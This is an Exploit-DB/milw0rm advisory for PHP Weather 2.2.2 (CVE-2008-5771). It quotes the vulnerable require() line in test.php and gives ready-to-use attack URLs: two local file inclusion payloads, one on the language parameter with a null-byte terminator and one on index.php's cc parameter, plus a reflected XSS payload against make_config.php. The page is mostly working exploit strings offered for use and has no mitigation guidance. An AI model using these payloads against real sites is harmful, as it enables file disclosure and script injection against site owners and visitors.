PHP Weather 2.2.2 (LFI/XSS) Multiple Remote Vulnerabilities



EDB-ID: 7451 CVE: 2008-5771 OSVDB-ID: 51067
Author: ahmadbady Published: 2008-12-14 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
****(Lfi/xss)****

script: phpweather-2.2.2

***************************************************************************
download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
   
***************************************************************************
vul:
/test.php

line 48:
 require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
   
***************************************************
xpl:
www.site.com/path/test.php?metar=()&language=[Lfi]%00
.....................................................
www.site.com/path/index.php?cc=[Lfi]
....................................................
xss:
www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
..................................................

Author: ahmadbady from:iran

***************************************************

# milw0rm.com [2008-12-14]






Comments

No comments so far